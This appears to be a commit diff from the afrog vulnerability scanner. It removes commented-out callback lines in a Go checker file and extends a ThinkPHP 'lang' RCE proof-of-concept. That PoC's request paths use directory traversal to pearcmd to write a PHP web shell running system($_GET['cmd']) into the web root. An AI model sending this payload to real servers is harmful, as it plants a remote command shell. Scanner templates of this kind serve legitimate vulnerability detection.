STRLCPY/afrog

update checker and thinkphp-lang-rce
zan8in committed 1 year ago

96b400f3

1 parent ce810a9f

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

■ ■ ■ ■ ■ ■

pkg/core/checker.go

		skipped 39 lines
40	40		defer func() {
41	41		if r := recover(); r != nil {
42	42		c.Result.IsVul = false
43		-	// c.Options.ApiCallBack(c.Result)
44	43		}
45	44		}()
46	45
47	46		// check target alive.
48	47		if targetlive.TLive.HandleTargetLive(target, -1) == -1 \|\| len(target) == 0 {
49	48		c.Result.IsVul = false
50		-	// c.Options.ApiCallBack(c.Result)
51	49		return err
52	50		}
53	51
		skipped 21 lines
75	73		c.OriginalRequest, err = http.NewRequest("GET", target, nil)
76	74		if err != nil {
77	75		c.Result.IsVul = false
78		-	// c.Options.ApiCallBack(c.Result)
79	76		return err
80	77		}
81	78
82	79		tempRequest, err := http2.ParseRequest(c.OriginalRequest)
83	80		if err != nil {
84	81		c.Result.IsVul = false
85		-	// c.Options.ApiCallBack(c.Result)
86	82		return err
87	83		}
88	84		c.VariableMap["request"] = tempRequest
		skipped 14 lines
103	99
104	100		if targetlive.TLive.HandleTargetLive(target, -1) == -1 \|\| len(target) == 0 {
105	101		c.Result.IsVul = false
106		-	// c.Options.ApiCallBack(c.Result)
107	102		return err
108	103		}
109	104
		skipped 36 lines
146	141
147	142		if rule.StopIfMismatch && !isMatch {
148	143		c.Result.IsVul = false
149		-	// c.Options.ApiCallBack(c.Result)
150	144		return err
151	145		}
152	146
153	147		if rule.StopIfMatch && isMatch {
154	148		c.Result.IsVul = true
155		-	// c.Options.ApiCallBack(c.Result)
156	149		return err
157	150		}
158	151
159	152		if matchCondition == poc.STOP_IF_FIRST_MISMATCH && !isMatch {
160	153		c.Result.IsVul = false
161		-	// c.Options.ApiCallBack(c.Result)
162	154		return err
163	155		}
164	156
165	157		if matchCondition == poc.STOP_IF_FIRST_MATCH && isMatch {
166	158		c.Result.IsVul = true
167		-	// c.Options.ApiCallBack(c.Result)
168	159		return err
169	160		}
170	161
		skipped 2 lines
173	164		isVul, err := c.CustomLib.RunEval(pocItem.Expression, c.VariableMap)
174	165		if err != nil {
175	166		c.Result.IsVul = false
176		-	// c.Options.ApiCallBack(c.Result)
177	167		return err
178	168		}
179	169
180	170		c.Result.IsVul = isVul.Value().(bool)
181		-	// c.Options.ApiCallBack(c.Result)
182	171
183	172		return err
184	173		}
		skipped 35 lines
220	209		// check target alive.
221	210		if targetlive.TLive.HandleTargetLive(target, -1) == -1 \|\| len(target) == 0 {
222	211		c.Result.IsVul = false
223		-	// c.Options.ApiCallBack(c.Result)
224	212		return err
225	213		}
226	214
		skipped 4 lines
231	219		targetlive.TLive.AddRequestTarget(target+gopocName, 2)
232	220		c.Result.IsVul = false
233	221		c.Result.PocInfo = gpa.Poc
234		-	// c.Options.ApiCallBack(c.Result)
235	222		return err
236	223		}
237	224		targetlive.TLive.AddRequestTarget(target+gopocName, 2)
		skipped 7 lines
245	232		c.Result.AllPocResult = append(c.Result.AllPocResult, &PocResult{ResultRequest: v.ResultRequest, ResultResponse: v.ResultResponse, IsVul: v.IsVul})
246	233		}
247	234		}
248		-	// c.Options.ApiCallBack(c.Result)
249	235
250	236		return nil
251	237		}
		skipped 47 lines

■ ■ ■ ■ ■ ■

pocs/temp/afrog-pocs/vulnerability/thinkphp-lang-rce.yaml

		skipped 14 lines
15	15		method: GET
16	16		path: "/public/?+config-create+/&&lang=../../../../../../../../usr/local/lib/php/pearcmd&/<?=system($_GET['cmd'])?>+/var/www/html/{{fileName}}"
17	17		expression: response.status == 200 && response.body.bcontains(b'CONFIGURATION')
18		-	expression: r0()
	18	+	r1:
	19	+	request:
	20	+	method: GET
	21	+	path: "/?+config-create+/&&lang=../../../../../../../../usr/local/lib/php/pearcmd&/<?=system($_GET['cmd'])?>+/var/www/html/{{fileName}}"
	22	+	expression: response.status == 200 && response.body.bcontains(b'CONFIGURATION')
	23	+	expression: r0() \|\| r1()

update checker and thinkphp-lang-rce